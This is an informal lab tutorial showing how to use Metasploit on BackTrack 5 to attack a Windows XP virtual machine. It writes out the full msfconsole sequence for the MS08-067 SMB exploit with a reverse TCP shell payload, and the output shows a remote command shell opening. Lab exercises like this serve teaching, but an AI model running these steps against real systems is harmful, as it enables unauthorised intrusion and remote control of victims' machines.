BACKTRACK 5

…LEARN TO CONFIG AND RUN COMMANDS TO PENETRATE A XP MACHINE

FIRSTLY……

• DOWNLOAD BACKTRACK vmx format FROM @

http://www.backtrack-linux.org/downloads/

SECONDLY……….

• Run VMWARE and load xp machine and the backtrack vmx machine.

• In this VM lab…the XP machine terminal is attacked by the BT terminal

THIRDLY…….config IP address to BT machine

Here the IP configured is 80.0.2.251

FOURTHLY…….config IP address to XP machine

Here the IP configured is 80.0.2.252

FIFTHLY………..

• NOW JUST TO MAKE A SMALL CHECK OFCONNECTIONS…..DO THE BRIDGING AND PINGBOTH THE MACHINES FROM BOTH TERMINALS

SIXTHLY…..run the following on the BT terminal

• root@bt:~# cd /pentest/exploits/framework3

• root@bt:/pentest/exploits/framework3#

• root@bt:/pentest/exploits/framework3# ./msfconsole

• o 8 o o

• 8 8 8

• ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P

• 8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8

• 8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8

• 8 8 8 ̀ Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8

• ..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:

• ::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::

• ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

• =[ metasploit v3.7.0-release [core:3.7 api:1.0]

• + -- --=[ 684 exploits - 355 auxiliary

• + -- --=[ 217 payloads - 27 encoders - 8 nops

• =[ svn r12536 updated 169 days ago (2011.05.04)

• Warning: This copy of the Metasploit Framework was last updated 169 days ago.

• We recommend that you update the framework at least every other day.

• For information on updating your copy of Metasploit, please see:

• http://www.metasploit.com/redmine/projects/framework/wiki/Updating

• msf >

RED DENOTES THECOMMANDS TO BETYPED….minimal!!!!

• msf >

• msf > use exploit/windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > set RHOST 80.0.2.252

• RHOST => 80.0.2.252

• msf exploit(ms08_067_netapi) > set LHOST 80.0.2.251

• LHOST => 80.0.2.251

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp

• PAYLOAD => windows/shell/reverse_tcp

• msf exploit(ms08_067_netapi) > exploit

• [*] Started reverse handler on 80.0.2.251:4444

• [*] Automatically detecting the target...

• [*] Fingerprint: Windows XP - Service Pack 3 - lang:English

• [*] Selected Target: Windows XP SP3 English (NX)

• [*] Attempting to trigger the vulnerability...

• [*] Sending stage (240 bytes) to 80.0.2.252

• [*] Command shell session 1 opened (80.0.2.251:4444 -> 80.0.2.252:1133) at 2011-10-20 05:15:55 -0400

• Microsoft Windows XP [Version 5.1.2600]

• (C) Copyright 1985-2001 Microsoft Corp.

• C:\WINDOWS\system32> u r done!!!!!!!!!!!!!!!!!!

RED DENOTES THECOMMANDS TO BETYPED….minimal!!!!

• Any questions????

…please message or mail at anupam@blumail.org